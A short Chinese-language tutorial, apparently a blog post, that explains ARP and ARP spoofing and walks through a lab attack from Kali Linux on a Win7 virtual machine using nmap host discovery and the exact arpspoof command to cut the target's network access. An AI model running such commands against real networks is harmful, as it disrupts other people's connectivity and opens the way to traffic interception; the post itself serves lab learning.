Kali——ARP區域網路攻擊
什麼是ARP?
ARP ( Address Resolution Protocol)位址轉換協定,工作在OSI模型的資料鍊路層,在以太網中,網絡裝置之間互相通信是用MAC位址而不是IP位址,ARP協定就是用來把IP位址轉換為MAC位址的.
那什麼又是arp斷網攻擊呢?
簡單來說就是就是通過僞造IP位址和MAC位址實作ARP欺騙,能夠在網絡中産生大量的ARP通信量使網絡阻塞,攻擊者隻要持續不斷的發出僞造的ARP響應包就能更改目标主機ARP緩存中的IP-MAC條目,造成網絡中斷。
一.攻擊前的準備
1.環境:Vmware,Kali linux,Win7虛拟機一台
2.在Kali的終端上輸入ifconfig,進而獲得攻擊者(Kali)的ip位址以及網卡
3.同樣是在Kali的終端上輸入route -n,來擷取Kali的網關
4.用nmap指令掃描端口。 指令格式是 nmap [-sP 網段] 後面的網段根據目前網絡填,比如我kali的ip是192.168.138.128,就填192.168.138.0/24
這裡掃描到Win7虛拟機的IP位址是192.168.138.130
二.開始攻擊
使用Arpspoof:
Arpspoof -i 網卡 -t 目标IP網關
這裡網卡是eth0 目标IP是192.168.138.130網關是192.168.138.2
是以指令就是:
arpspoof -i eth0 -t 192.168.138.130 192.168.138.2
開始攻擊後的示範圖:
三.檢視Win7虛拟機的上網情況
輸入ctrl+z 停止攻擊後,Win7虛拟機上網恢複正常